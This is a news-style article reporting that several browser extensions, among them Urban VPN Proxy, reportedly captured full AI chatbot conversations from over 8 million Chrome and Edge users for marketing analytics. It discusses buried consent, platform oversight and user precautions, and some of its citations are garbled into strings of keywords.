
Millions of people have been pouring their most sensitive prompts, plans, and confessions into AI chatbots, assuming those conversations stay between them and the model. Instead, a cluster of popular browser add-ons has quietly been scooping up those long AI chats and shipping them off for profit and analytics, affecting more than 8 million users across Chrome and Edge. The result is a privacy mess that blurs the line between “free” convenience and covert surveillance of our digital inner lives.
What looked like routine helpers in the browser toolbar have turned out to be data funnels, capturing extended AI conversations in raw form and feeding them into marketing pipelines and third party tools. The extensions at the center of this storm marketed themselves as “privacy” or utility tools, yet buried legalese and hidden behaviors reveal a business model built on harvesting the very prompts people thought were protected.
The extensions quietly siphoning AI chat logs
The core of the scandal is simple and unsettling: browser extensions that users installed for VPN access or productivity are copying entire AI conversations and sending them to remote servers. According to detailed technical analysis, these add-ons do not just skim metadata or short snippets, they collect extended prompts and responses from AI chatbots in what investigators describe as “raw form,” turning the browser into a wiretap on people’s most detailed queries and drafts. One investigation into “Uninstall Now, These Chrome Browser Extensions Are Stealing AI Chat Logs” shows how these tools hook into page content and exfiltrate full chat histories without any obvious in-product warning to the user, a pattern that has now been linked to multiple extensions with millions of installs, including Dec, Uninstall Now, These Chrome Browser Extensions Are Stealing AI Chat Logs.
Security researchers tracking this activity describe a consistent playbook. Once installed, the extensions inject scripts into pages where users interact with AI tools, then watch for long-running conversations and capture them wholesale. In some cases, the data is routed through analytics platforms that are not disclosed in the extension’s main description, and the only explicit mention of AI conversations being harvested appears in dense privacy policy language that most people never read. Reporting on Dec browser extensions with 8 million users collect extended AI conversations underscores that the data is then used for marketing analytics purposes, far beyond what users would reasonably expect from a simple browser add-on.
How 8 million users’ AI conversations became a commodity
The scale of the collection is not a rounding error, it is a business model built on volume. Investigators have tied the behavior to a set of extensions with more than 8 million installations, meaning entire populations of AI users have had their prompts and responses quietly turned into a dataset. One analysis describes how these tools were promoted as privacy helpers or VPNs while simultaneously funneling AI conversations into commercial pipelines, effectively converting user trust into a stream of monetizable text. A report titled “8 Million Users’ AI Conversations Sold for Profit by ‘Privacy’ Extensions” details how over 8 million users were affected and how their data was packaged and sold, with the author, Dec, Million Users, Conversations Sold for Profit, Privacy, Extensions, Idan Dardikman, highlighting that the extensions failed to meet basic platform quality standards.
From a user’s perspective, the betrayal is layered. People turned to AI tools for everything from drafting legal letters to brainstorming business ideas, assuming that any risk lay with the AI provider, not a third party extension sitting in the browser chrome. Instead, those conversations were quietly repurposed as a commodity, with long prompts and responses treated as raw material for marketing analytics and other undisclosed uses. Coverage on Dec, Browser Extensions With, Million Users Collect Extended AI Conversations, PSA notes that an anonymous reader flagged how the extensions were collecting data for purposes other than their described use, turning what looked like a free convenience into a covert data extraction scheme.
Urban VPN Proxy and the “privacy” branding problem
One of the most prominent names in this saga is Urban VPN Proxy, a free VPN-style extension that positioned itself as a privacy tool while allegedly participating in the collection of AI chat logs. Security firm Koi has linked Urban VPN Proxy and three other popular browser extensions, collectively installed on more than 8 million devices, to the harvesting of AI chatbot conversations in raw form. In practical terms, that means a user who installed Urban VPN Proxy to shield their browsing could have been simultaneously exposing the full text of their AI chats to third party servers, a contradiction that cuts to the heart of the “privacy” branding many of these tools rely on. Reporting that “According to cybersecurity firm Koi, Urban VPN Proxy and three other popular browser extensions with 8 million+ installs” were involved in this behavior is captured in Dec, According, Koi, Urban VPN Proxy and.
The Urban VPN Proxy case also fits into a broader pattern of free VPN and proxy tools that promise anonymity while quietly monetizing user data. Earlier this year, another notorious case involved the “Free Unlimited VPN” extensions, which were removed after years of reportedly siphoning user information, a reminder that the word “free” in the VPN world often masks aggressive data collection. Coverage of how Urban VPN Proxy is the latest free VPN accused of spying on users, and how that follows the saga of Dec, Another, Free Unlimited VPN, underscores how AI interactions and online privacy are colliding in the browser extension ecosystem.
Legal fine print versus real-world consent
On paper, the companies behind these extensions can point to privacy policies that mention data collection, including AI prompts, but the way those disclosures are buried raises serious questions about meaningful consent. In at least one case, the only explicit reference to harvesting AI conversations appears deep in the legalese, where the policy notes that prompts may be collected for marketing analytics purposes. For an average user installing a VPN or utility extension, that kind of clause is effectively invisible, especially when the extension’s store listing emphasizes privacy and security. The reporting that “The only explicit mention of AI conversations being harvested is in legalese buried in the privacy policy” and that the data is used for marketing analytics is detailed in Dec.
From a regulatory and ethical standpoint, this gap between branding and behavior is stark. When an extension markets itself as a “privacy” tool but hides its most invasive practices in dense text, it undermines the idea that users have genuinely agreed to the tradeoff. It also complicates the responsibilities of browser platforms like Chrome and Edge, which are supposed to vet extensions for deceptive practices. The fact that these add-ons could continue to operate at scale, with millions of installs, while quietly collecting AI conversations suggests that current disclosure standards and store reviews are not catching the most consequential forms of data harvesting.
Why AI chat logs are such sensitive targets
AI conversations are not just another category of browsing data, they are often a direct window into a person’s plans, fears, and intellectual property. Users routinely paste draft contracts, medical questions, business strategies, and even snippets of source code into chatbots, trusting that the interaction is semi-private and governed by the AI provider’s policies. When a browser extension copies those exchanges in raw form, it captures far more than a URL or cookie, it seizes the full context of what someone is thinking through at that moment. The warning that these Chrome extensions are “stealing AI chat logs” in raw form, as highlighted in Dec, Uninstall Now, underscores how much more invasive this is than traditional tracking.
That sensitivity also makes AI logs attractive to marketers and data brokers. Long prompts can reveal purchasing intent, professional roles, and even company secrets, all of which can be mined for targeting or sold as high value datasets. In one analysis, investigators describe how the captured conversations were routed into analytics platforms, where they could be segmented and studied at scale. The fact that this pipeline operated through browser extensions, rather than the AI platforms themselves, means users had little reason to suspect that their supposedly private brainstorming sessions were being turned into a commercial asset.
Malicious engineering and the blurred line with malware
Technically, these extensions sit in a gray zone between aggressive tracking and outright malware. They are installed through official stores, often with high ratings, and they perform some of the functions they advertise, such as proxying traffic or adding convenience features. At the same time, security experts have described the AI log harvesting behavior as a form of malicious engineering, noting that the extensions include code paths that only activate under certain conditions, such as when developer tools are opened or when specific AI sites are loaded. A widely shared warning video framed the incident as “not your standard malware attack,” explaining that this type of attack was enacted by a computer engineer who gave the extension hidden capabilities that only became visible if developer tools were opened, a description captured in Dec.
From a user’s standpoint, that stealth is what makes the threat so hard to detect. There is no obvious ransomware demand, no pop-up alert, just a silent siphon running in the background while the extension appears to function normally. This kind of design exploits the trust people place in official browser stores and the assumption that high download counts equal safety. It also complicates the work of security tools, which may not flag an extension that behaves benignly most of the time but quietly exfiltrates data under specific conditions tied to AI usage.
Platform oversight and the Chrome and Edge gap
One of the most troubling aspects of the episode is how long the extensions remained available in mainstream browser stores even after their behavior was documented. At the time investigators detailed the AI conversation leak, the extensions were still active in the Chrome Web Store and Microsoft Edge Add-ons, despite evidence that they were funneling sensitive data to third parties. That disconnect between documented risk and platform response raises questions about how quickly Chrome and Edge can or will act when confronted with complex privacy abuses that do not fit the classic malware mold. Reporting that “At the time of writing, the extensions remain active in the Chrome Web Store and Microsoft Edge Add-ons, despite the fact that they are at the center of a data leak via Mixpanel hack” is laid out in Dec, At the, Chrome Web Store and Microsoft Edge Add.
The involvement of analytics platforms like Mixpanel in the data flow also complicates accountability. When AI conversations are routed through third party tools as part of “analytics,” it becomes harder to draw a clean line between the extension developer, the analytics provider, and the browser platform that approved the extension. For users, that fragmentation means there is no single entity clearly responsible for safeguarding their AI chats, even as those chats move through multiple corporate systems. It also suggests that browser extension review processes may need to evolve from static code checks to more dynamic analysis of how extensions behave when interacting with AI-heavy sites.
What users can do now, and what needs to change
For the 8 million plus users already affected, the immediate priority is containment. That starts with uninstalling any extensions that have been linked to AI conversation harvesting, especially those that market themselves as free VPNs or privacy tools while requesting broad permissions to read and change data on all websites. Users should also audit their extension lists for anything they do not recognize or no longer use, and consider limiting AI chats that contain highly sensitive information until they are confident their browser environment is clean. The detailed breakdown of how Urban VPN Proxy and related tools operated, and how over 8 million users were swept up, in Dec, Million Users underscores why that kind of hygiene is no longer optional.
Longer term, the episode points to a need for deeper structural changes. Browser makers will have to tighten extension review processes, especially for tools that request access to page content on AI platforms, and may need to introduce clearer warnings when an extension can read everything a user types into a chatbot. Regulators, meanwhile, are likely to scrutinize the gap between “privacy” branding and buried data collection clauses, particularly when the data in question includes detailed AI conversations. As AI becomes a default interface for work and personal life, the quiet harvesting of those chats by browser extensions is not just a niche security story, it is a test of whether the web’s trust infrastructure can keep up with the new ways we talk to machines.
More from MorningOverview